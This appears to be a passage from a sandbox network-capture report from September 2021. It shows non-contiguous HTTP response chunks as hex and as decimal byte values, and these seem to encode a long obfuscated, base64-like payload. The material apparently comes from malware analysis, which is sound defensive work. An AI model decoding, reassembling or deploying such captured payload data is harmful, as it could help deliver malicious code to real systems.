                                                                                              2021-09-27 18:27:27 UTC959INData Raw: 32 33 34 20 31 39 30 20 31 35 39 20 32 33 34 20 31 38 39 20 31 37 32 20 32 33 34 20 31 39 30 20 31 38 30 20 32 33 34 20 31 39 30 20 31 33 31 20 32 33 34 20 31 38 39 20 31 37 35 20 32 33 34 20 31 38 39 20 31 37 31 20 32 33 34 20 31 38 39 20 31 37 38 20 32 33 34 20 31 38 39 20 31 37 39 20 32 33 34 20 31 38 39 20 31 37 31 20 32 33 34 20 31 38 39 20 31 37 38 20 32 33 34 20 31 39 30 20 31 34 34 20 32 33 34 20 31 38 39 20 31 38 30 20 30 20 32 32 36 20 31 39 31 20 31 37 36 20 32 32 37 20 31 32 38 20 31 36 36 20 32 32 36 20 31 39 31 20 31 38 32 20 32 32 37 20 31 32 38 20 31 35 31 20 32 32 37 20 31 32 38 20 31 33 36 20 32 32 36 20 31 39 31 20 31 38 31 20 32 32 37 20 31 32 38 20 31 36 34 20 32 32 37 20 31 32 38 20 31 32 38 20 32 32 36 20 31 39 31 20 31 37 38 20 32
                                                                                              Data Ascii: 234 190 159 234 189 172 234 190 180 234 190 131 234 189 175 234 189 171 234 189 178 234 189 179 234 189 171 234 189 178 234 190 144 234 189 180 0 226 191 176 227 128 166 226 191 182 227 128 151 227 128 136 226 191 181 227 128 164 227 128 128 226 191 178 2
                                                                                              2021-09-27 18:27:27 UTC975INData Raw: 36 20 31 35 33 20 31 33 39 20 32 33 36 20 31 35 33 20 31 34 33 20 32 33 36 20 31 35 33 20 31 36 37 20 32 33 36 20 31 35 33 20 31 38 37 20 32 33 36 20 31 35 33 20 31 34 36 20 32 33 36 20 31 35 34 20 31 34 37 20 32 33 36 20 31 35 33 20 31 38 37 20 32 33 36 20 31 35 33 20 31 34 32 20 32 33 36 20 31 35 33 20 31 39 31 20 32 33 36 20 31 35 34 20 31 33 37 20 32 33 36 20 31 35 34 20 31 32 38 20 32 33 36 20 31 35 33 20 31 38 38 20 30 20 32 33 34 20 31 35 39 20 31 35 39 20 32 33 34 20 31 35 39 20 31 38 34 20 32 33 34 20 31 35 39 20 31 35 36 20 32 33 34 20 31 35 39 20 31 36 30 20 32 33 34 20 31 36 30 20 31 35 35 20 32 33 34 20 31 35 39 20 31 35 35 20 32 33 34 20 31 35 39 20 31 35 33 20 32 33 34 20 31 36 30 20 31 35 31 20 32 33 34 20 31 35 39 20 31 35 33 20 32 33 34
                                                                                              Data Ascii: 6 153 139 236 153 143 236 153 167 236 153 187 236 153 146 236 154 147 236 153 187 236 153 142 236 153 191 236 154 137 236 154 128 236 153 188 0 234 159 159 234 159 184 234 159 156 234 159 160 234 160 155 234 159 155 234 159 153 234 160 151 234 159 153 234
                                                                                              2021-09-27 18:27:27 UTC991INData Raw: 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 30 20 30 20 37 30 20 30 20 38 37 20 30 20 37 37 20 30 20 34 37 20 30 20 39 30 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 38 34 20 30 20 37 39 20 30 20 37 35 20 30 20 36 36 20 30 20 34 33 20 30 20 31 31 35 20 30 20 31 31 32 20 30 20 37 38 20 30 20 36 39 20 30 20 37 34 20 30 20 31 30 39 20 30 20 36 38 20 30 20 35 35 20 30 20 39 38 20 30 20 36 35 20 30 20 31 31 37 20 30 20 31 30 32 20 30 20 37 33 20 30 20 36 35 20
                                                                                              Data Ascii: 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 70 0 87 0 76 0 55 0 70 0 70 0 87 0 77 0 47 0 90 0 109 0 105 0 84 0 79 0 75 0 66 0 43 0 115 0 112 0 78 0 69 0 74 0 109 0 68 0 55 0 98 0 65 0 117 0 102 0 73 0 65
                                                                                              2021-09-27 18:27:27 UTC1007INData Raw: 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 37 20 30 20 31 30 34 20 30 20 37 33 20 30 20 31 32 30 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 36 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 36 35 20 30 20 38 33 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 34 37 20 30 20 36 39 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 37 20 30 20 31 30 34 20 30 20 31 30 37 20 30 20 31 32 30 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 36 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 36 35 20 30 20 38 33 20 30 20 37 36 20 30 20 36 36 20
                                                                                              Data Ascii: 0 84 0 65 0 65 0 65 0 85 0 87 0 104 0 73 0 120 0 48 0 65 0 65 0 105 0 56 0 55 0 47 0 85 0 65 0 83 0 76 0 66 0 109 0 111 0 65 0 106 0 89 0 47 0 69 0 84 0 65 0 65 0 65 0 85 0 87 0 104 0 107 0 120 0 48 0 65 0 65 0 105 0 56 0 55 0 47 0 85 0 65 0 83 0 76 0 66
                                                                                              2021-09-27 18:27:27 UTC1023INData Raw: 30 20 31 30 37 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 38 39 20 30 20 35 33 20 30 20 37 32 20 30 20 35 32 20 30 20 31 30 38 20 30 20 37 38 20 30 20 35 37 20 30 20 37 33 20 30 20 31 30 38 20 30 20 37 30 20 30 20 34 37 20 30 20 37 32 20 30 20 38 35 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 37 20 30 20 36 36 20 30 20 38 32 20 30 20 35 34 20 30 20 37 35 20 30 20 39 37 20 30 20 38 30 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 30 20 30 20 31 30 38 20 30 20 39 30 20 30 20 31 30 30 20 30 20 36 35 20 30 20 37 33 20 30 20 31 32 32 20 30 20 34 37 20 30 20 35 32 20 30 20 37 32 20 30 20 37 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20
                                                                                              Data Ascii: 0 107 0 111 0 65 0 65 0 71 0 89 0 53 0 72 0 52 0 108 0 78 0 57 0 73 0 108 0 70 0 47 0 72 0 85 0 81 0 97 0 107 0 66 0 82 0 54 0 75 0 97 0 80 0 65 0 65 0 67 0 70 0 119 0 70 0 108 0 90 0 100 0 65 0 73 0 122 0 47 0 52 0 72 0 71 0 65 0 65 0 103 0 65 0 65 0 79
                                                                                              2021-09-27 18:27:27 UTC1039INData Raw: 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 36 37 20 30 20 36 39 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 36 39 20 30 20 31 31 31 20 30 20 31 32 31 20 30 20 38 34 20 30 20 34 33 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 31 20 30 20 31 31 33 20 30 20 31 30 35 20 30 20 31 31 32 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 38 20 30 20 37 34 20 30 20 36 36 20 30 20 36 36 20 30 20 38 31 20 30 20 35 34 20 30 20 37 30 20 30 20 38 39 20 30 20 31 32 30 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 31 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 35 20 30 20 34 38 20 30 20 31 31 39 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36
                                                                                              Data Ascii: 0 74 0 65 0 65 0 68 0 67 0 69 0 65 0 68 0 47 0 100 0 67 0 81 0 69 0 111 0 121 0 84 0 43 0 81 0 65 0 66 0 111 0 113 0 105 0 112 0 65 0 65 0 80 0 57 0 48 0 74 0 66 0 66 0 81 0 54 0 70 0 89 0 120 0 65 0 65 0 66 0 81 0 47 0 120 0 85 0 48 0 119 0 107 0 65 0 6
                                                                                              2021-09-27 18:27:27 UTC1055INData Raw: 32 20 30 20 38 32 20 30 20 31 30 31 20 30 20 31 32 32 20 30 20 38 39 20 30 20 31 32 31 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 35 34 20 30 20 37 39 20 30 20 36 39 20 30 20 31 30 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 31 20 30 20 31 30 34 20 30 20 38 31 20 30 20 31 30 36 20 30 20 39 30 20 30 20 35 31 20 30 20 31 31 31 20 30 20 35 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 32 30 20 30 20 34 38 20 30 20 38 38 20 30 20 34 38 20 30 20 35 33 20 30 20 37 37 20 30 20 31 31 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 31 30 34 20 30 20 35 37 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30
                                                                                              Data Ascii: 2 0 82 0 101 0 122 0 89 0 121 0 48 0 65 0 65 0 54 0 79 0 69 0 109 0 65 0 65 0 67 0 74 0 82 0 102 0 67 0 78 0 82 0 101 0 104 0 81 0 106 0 90 0 51 0 111 0 57 0 47 0 47 0 47 0 120 0 48 0 88 0 48 0 53 0 77 0 116 0 65 0 65 0 79 0 104 0 57 0 72 0 81 0 65 0 65 0
                                                                                              2021-09-27 18:27:27 UTC1071INData Raw: 30 20 35 30 20 30 20 36 39 20 30 20 38 30 20 30 20 34 37 20 30 20 38 38 20 30 20 37 37 20 30 20 34 33 20 30 20 35 30 20 30 20 37 34 20 30 20 38 32 20 30 20 36 37 20 30 20 38 31 20 30 20 38 31 20 30 20 38 32 20 30 20 38 36 20 30 20 38 37 20 30 20 37 38 20 30 20 31 31 30 20 30 20 38 39 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 31 34 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 38 39 20 30 20 35 34 20 30 20 38 30 20 30 20 31 31 31 20 30 20 37 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 35 20 30 20 31 32 30 20 30 20 37 30 20 30 20 31
                                                                                              Data Ascii: 0 50 0 69 0 80 0 47 0 88 0 77 0 43 0 50 0 74 0 82 0 67 0 81 0 81 0 82 0 86 0 87 0 78 0 110 0 89 0 65 0 67 0 65 0 65 0 68 0 111 0 114 0 66 0 48 0 65 0 65 0 70 0 68 0 47 0 100 0 67 0 81 0 89 0 54 0 80 0 111 0 76 0 65 0 65 0 67 0 68 0 120 0 65 0 120 0 70 0 1
                                                                                              2021-09-27 18:27:27 UTC1087INData Raw: 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 34 20 30 20 39 39 20 30 20 36 36 20 30 20 34 39 20 30 20 36 39 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 35 37 20 30 20 37 37 20 30 20 31 30 30 20 30 20 37 30 20 30 20 34 37 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 38 32 20 30 20 38 34 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 38 32 20 30 20 31 30 32 20 30 20 31 32 30 20 30 20 31 30 31 20 30 20 31 32 31 20 30 20 39 39 20 30 20 37 38 20 30 20 38 36 20 30 20 31 30 35 20 30 20 34 33 20 30 20 31 32 30 20 30 20 38 32 20 30 20 38 35 20 30 20 34 39 20 30 20 39 37 20 30 20 37 38 20 30 20 31 30 36 20 30 20
                                                                                              Data Ascii: 119 0 69 0 65 0 65 0 104 0 99 0 66 0 49 0 69 0 80 0 57 0 49 0 57 0 77 0 100 0 70 0 47 0 65 0 69 0 65 0 65 0 65 0 68 0 47 0 70 0 82 0 84 0 65 0 81 0 65 0 67 0 76 0 82 0 102 0 120 0 101 0 121 0 99 0 78 0 86 0 105 0 43 0 120 0 82 0 85 0 49 0 97 0 78 0 106 0
                                                                                              2021-09-27 18:27:27 UTC1103INData Raw: 30 20 35 30 20 30 20 36 36 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 39 37 20 30 20 37 34 20 30 20 31 32 32 20 30 20 36 38 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 38 31 20 30 20 36 38 20 30 20 34 33 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 31 31 31 20 30 20 34 37 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 31 39 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 39 20 30 20 36 39 20 30 20 37 33 20 30 20 38 38 20 30 20 35 30 20 30 20 31 30 32 20 30 20 31 30 33 20 30 20 34 39 20 30 20 31 31 31 20 30 20 34 38 20 30 20 37 37 20 30 20 31 30 34 20 30 20 36 35 20
                                                                                              Data Ascii: 0 50 0 66 0 65 0 90 0 81 0 97 0 74 0 122 0 68 0 81 0 65 0 67 0 78 0 104 0 81 0 68 0 43 0 47 0 47 0 57 0 111 0 47 0 119 0 65 0 65 0 65 0 70 0 68 0 111 0 119 0 71 0 69 0 65 0 65 0 73 0 80 0 69 0 69 0 73 0 88 0 50 0 102 0 103 0 49 0 111 0 48 0 77 0 104 0 65
                                                                                              2021-09-27 18:27:27 UTC1119INData Raw: 30 35 20 30 20 31 32 30 20 30 20 35 36 20 30 20 35 35 20 30 20 38 38 20 30 20 36 37 20 30 20 38 31 20 30 20 38 31 20 30 20 31 30 30 20 30 20 36 36 20 30 20 36 36 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 39 39 20 30 20 37 33 20 30 20 37 39 20 30 20 35 36 20 30 20 39 30 20 30 20 35 36 20 30 20 35 36 20 30 20 36 38 20 30 20 38 30 20 30 20 36 35 20 30 20 38 38 20 30 20 34 39 20 30 20 35 33 20 30 20 39 38 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 38 31 20 30 20 36 35 20 30 20 31 31 39 20 30 20 31 30 31 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 31 32 31 20 30 20 38 31 20 30 20 36 37 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 35 20 30 20 37 34 20 30 20 31 30 33 20 30 20 35 30 20 30 20 38 31 20 30 20 37 33 20 30 20 36 36 20 30
                                                                                              Data Ascii: 05 0 120 0 56 0 55 0 88 0 67 0 81 0 81 0 100 0 66 0 66 0 65 0 103 0 56 0 99 0 73 0 79 0 56 0 90 0 56 0 56 0 68 0 80 0 65 0 88 0 49 0 53 0 98 0 119 0 103 0 81 0 65 0 119 0 101 0 65 0 68 0 103 0 121 0 81 0 67 0 65 0 73 0 115 0 74 0 103 0 50 0 81 0 73 0 66 0
                                                                                              2021-09-27 18:27:27 UTC1131INData Raw: 38 20 30 20 31 30 32 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 32 32 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 34 20 30 20 38 37 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 35 20 30 20 34 38 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 38 20 30 20 34 39 20 30 20 35 35 20 30 20 37 34 20 30 20 31 31 39 20 30 20 34 39 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 33 20 30 20 38 30 20 30 20 31 31 35 20 30 20 38 31 20 30 20 37 31 20 30 20 39 37 20 30 20 36 38 20 30 20 39 30 20 30 20 39 39 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 31 30 36 20 30 20 35 34 20 30 20 37 38 20 30 20 38 32 20 30 20 39 39 20 30 20 37 34 20 30 20 31 31 33 20 30 20 36 35 20 30 20 37 30 20 30 20
                                                                                              Data Ascii: 8 0 102 0 47 0 100 0 81 0 122 0 47 0 100 0 81 0 104 0 87 0 47 0 120 0 85 0 48 0 119 0 85 0 65 0 65 0 88 0 49 0 55 0 74 0 119 0 49 0 87 0 76 0 55 0 73 0 80 0 115 0 81 0 71 0 97 0 68 0 90 0 99 0 65 0 65 0 97 0 106 0 54 0 78 0 82 0 99 0 74 0 113 0 65 0 70 0
                                                                                              2021-09-27 18:27:27 UTC1135INData Raw: 20 37 33 20 30 20 37 38 20 30 20 35 37 20 30 20 36 38 20 30 20 36 35 20 30 20 38 35 20 30 20 38 30 20 30 20 31 30 34 20 30 20 39 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 36 38 20 30 20 38 33 20 30 20 31 32 32 20 30 20 34 33 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 32 32 20 30 20 35 30 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 37 36 20 30 20 31 30 30 20 30 20 36 36 20 30 20 38 34 20 30 20 31 31 34 20 30 20 36 38 20 30 20 36 38 20 30 20 31 31 36 20 30 20 37 30 20 30 20 36 39 20 30 20 36 35 20 30 20 34 33 20 30 20 36 39 20 30 20 31 31 34 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 36 20 30 20 36 36 20 30 20 37 33 20 30 20
                                                                                              Data Ascii: 73 0 78 0 57 0 68 0 65 0 85 0 80 0 104 0 99 0 81 0 65 0 65 0 65 0 67 0 76 0 68 0 83 0 122 0 43 0 81 0 65 0 65 0 122 0 50 0 122 0 118 0 76 0 100 0 66 0 84 0 114 0 68 0 68 0 116 0 70 0 69 0 65 0 43 0 69 0 114 0 81 0 65 0 65 0 65 0 73 0 80 0 66 0 66 0 73 0
                                                                                              2021-09-27 18:27:27 UTC1151INData Raw: 30 20 31 31 39 20 30 20 36 35 20 30 20 38 36 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 31 32 30 20 30 20 31 30 33 20 30 20 35 35 20 30 20 35 35 20 30 20 31 30 37 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 30 38 20 30 20 37 31 20 30 20 38 30 20 30 20 37 32 20 30 20 38 31 20 30 20 38 30 20 30 20 38 35 20 30 20 37 33 20 30 20 31 31 38 20 30 20 37 31 20 30 20 35 34 20 30 20 37 36 20 30 20 38 31 20 30 20 38 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 31 37 20 30 20 38 31 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 35 35 20 30 20 36 38 20 30 20 31 30 35 20 30 20 35 32 20 30 20 39 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 33 20 30
                                                                                              Data Ascii: 0 119 0 65 0 86 0 111 0 118 0 120 0 103 0 55 0 55 0 107 0 65 0 103 0 65 0 65 0 65 0 73 0 108 0 71 0 80 0 72 0 81 0 80 0 85 0 73 0 118 0 71 0 54 0 76 0 81 0 89 0 65 0 65 0 68 0 111 0 117 0 81 0 73 0 65 0 65 0 70 0 55 0 68 0 105 0 52 0 97 0 103 0 65 0 103 0
                                                                                              2021-09-27 18:27:27 UTC1163INData Raw: 31 30 35 20 30 20 36 37 20 30 20 37 36 20 30 20 31 32 30 20 30 20 31 31 37 20 30 20 31 30 34 20 30 20 39 39 20 30 20 35 30 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 39 37 20 30 20 31 30 38 20 30 20 31 32 31 20 30 20 37 36 20 30 20 31 32 30 20 30 20 31 31 37 20 30 20 31 30 34 20 30 20 38 34 20 30 20 35 30 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 39 37 20 30 20 31 30 35 20 30 20 34 33 20 30 20 37 36 20 30 20 31 32 30 20 30 20 31 31 37 20 30 20 31 30 34 20 30 20 37 35 20 30 20 35 30 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 39 37 20 30 20 31 30 35 20 30 20 31 30 35 20 30 20 37 36 20 30 20 31 32 30 20 30 20 31 31 37 20 30 20 31 30 34 20 30 20 36 36 20 30 20 35 30 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 39 37
                                                                                              Data Ascii: 105 0 67 0 76 0 120 0 117 0 104 0 99 0 50 0 80 0 47 0 47 0 97 0 108 0 121 0 76 0 120 0 117 0 104 0 84 0 50 0 80 0 47 0 47 0 97 0 105 0 43 0 76 0 120 0 117 0 104 0 75 0 50 0 80 0 47 0 47 0 97 0 105 0 105 0 76 0 120 0 117 0 104 0 66 0 50 0 80 0 47 0 47 0 97
                                                                                              2021-09-27 18:27:27 UTC1179INData Raw: 37 20 30 20 38 38 20 30 20 38 35 20 30 20 37 31 20 30 20 39 37 20 30 20 37 34 20 30 20 31 31 38 20 30 20 38 31 20 30 20 36 38 20 30 20 35 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 31 20 30 20 31 30 35 20 30 20 36 38 20 30 20 38 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 39 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 38 31 20 30 20 37 36 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 38 20 30 20 38 35 20 30 20 37 31 20 30 20 39 37 20 30 20 37 34 20 30 20 31 31 38 20 30 20 38 31 20 30 20 36 38 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 31 20 30 20 39 39 20 30 20 31 32 32 20 30 20 38 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 39 37 20 30 20 37 38 20 30
                                                                                              Data Ascii: 7 0 88 0 85 0 71 0 97 0 74 0 118 0 81 0 68 0 52 0 47 0 47 0 47 0 111 0 105 0 68 0 89 0 65 0 65 0 70 0 97 0 78 0 104 0 81 0 76 0 54 0 47 0 47 0 57 0 88 0 85 0 71 0 97 0 74 0 118 0 81 0 68 0 54 0 47 0 47 0 47 0 111 0 99 0 122 0 89 0 65 0 65 0 70 0 97 0 78 0
                                                                                              2021-09-27 18:27:27 UTC1195INData Raw: 36 35 20 30 20 37 36 20 30 20 31 32 32 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 38 32 20 30 20 31 30 30 20 30 20 38 33 20 30 20 37 39 20 30 20 37 30 20 30 20 31 32 30 20 30 20 35 31 20 30 20 38 35 20 30 20 31 30 32 20 30 20 31 30 35 20 30 20 34 38 20 30 20 38 39 20 30 20 34 38 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 35 36 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 39 37 20 30 20 37 36 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 35 37 20 30 20 38 31 20 30 20 39 37 20 30 20 37 31 20 30 20 31 31 31 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 37 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 31 30 34 20 30 20 37 39 20 30 20 37 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 36 37 20 30 20 37 36 20 30 20 38 32 20 30 20 31 30 32
                                                                                              Data Ascii: 65 0 76 0 122 0 122 0 118 0 82 0 100 0 83 0 79 0 70 0 120 0 51 0 85 0 102 0 105 0 48 0 89 0 48 0 105 0 85 0 88 0 56 0 105 0 119 0 97 0 76 0 122 0 118 0 57 0 81 0 97 0 71 0 111 0 65 0 105 0 57 0 106 0 111 0 104 0 79 0 72 0 47 0 47 0 49 0 67 0 76 0 82 0 102
                                                                                              2021-09-27 18:27:27 UTC1211INData Raw: 20 30 20 36 39 20 30 20 36 36 20 30 20 31 30 31 20 30 20 31 31 39 20 30 20 35 30 20 30 20 31 31 32 20 30 20 38 31 20 30 20 34 37 20 30 20 31 32 32 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 32 31 20 30 20 38 30 20 30 20 38 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 31 30 34 20 30 20 35 33 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 37 37 20 30 20 31 31 39 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 33 20 30 20 38 32 20 30 20 31 31 31 20 30 20 34 33 20 30 20 38 30 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 31 30 34 20 30 20 31 31 30 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20
                                                                                              Data Ascii: 0 69 0 66 0 101 0 119 0 50 0 112 0 81 0 47 0 122 0 90 0 111 0 121 0 80 0 86 0 65 0 65 0 79 0 104 0 53 0 74 0 65 0 65 0 65 0 97 0 77 0 119 0 67 0 65 0 65 0 68 0 47 0 100 0 103 0 82 0 111 0 43 0 80 0 74 0 65 0 65 0 79 0 104 0 110 0 74 0 65 0 65 0 65 0 103
                                                                                              2021-09-27 18:27:27 UTC1227INData Raw: 35 20 30 20 35 32 20 30 20 35 30 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 37 37 20 30 20 39 39 20 30 20 37 30 20 30 20 35 32 20 30 20 37 37 20 30 20 31 30 34 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 31 30 30 20 30 20 38 34 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 31 30 36 20 30 20 35 33 20 30 20 37 37 20 30 20 31 30 34 20 30 20 36 36 20 30 20 36 35 20 30 20 37 35 20 30 20 37 32 20 30 20 31 30 37 20 30 20 31 32 31 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 37 39 20 30 20 35 36 20 30 20 37 38 20 30 20 34 38 20 30 20 36 39 20 30 20 38 39 20 30 20 34 39 20 30 20 37 38 20 30 20
                                                                                              Data Ascii: 5 0 52 0 50 0 85 0 65 0 65 0 85 0 77 0 99 0 70 0 52 0 77 0 104 0 66 0 65 0 65 0 69 0 65 0 65 0 65 0 68 0 47 0 70 0 100 0 84 0 65 0 81 0 65 0 67 0 106 0 53 0 77 0 104 0 66 0 65 0 75 0 72 0 107 0 121 0 69 0 69 0 65 0 79 0 56 0 78 0 48 0 69 0 89 0 49 0 78 0
                                                                                              2021-09-27 18:27:27 UTC1243INData Raw: 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 36 35 20 30 20 31 31 38 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 39 38 20 30 20 34 38 20 30 20 36 35 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 34 20 30 20 37 37 20 30 20 36 39 20 30 20 38 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 37 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 36 37 20 30 20 34 37 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 38 36 20 30 20 34 39 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 39 38 20 30 20 34 38 20 30 20 36 35 20 30 20 34 37 20 30 20 38 30 20 30 20 34 37
                                                                                              Data Ascii: 65 0 65 0 65 0 65 0 73 0 50 0 70 0 65 0 118 0 114 0 47 0 47 0 49 0 66 0 109 0 105 0 98 0 48 0 65 0 43 0 118 0 47 0 47 0 54 0 77 0 69 0 82 0 65 0 65 0 66 0 87 0 106 0 89 0 85 0 67 0 47 0 80 0 47 0 47 0 86 0 49 0 66 0 109 0 105 0 98 0 48 0 65 0 47 0 80 0 47
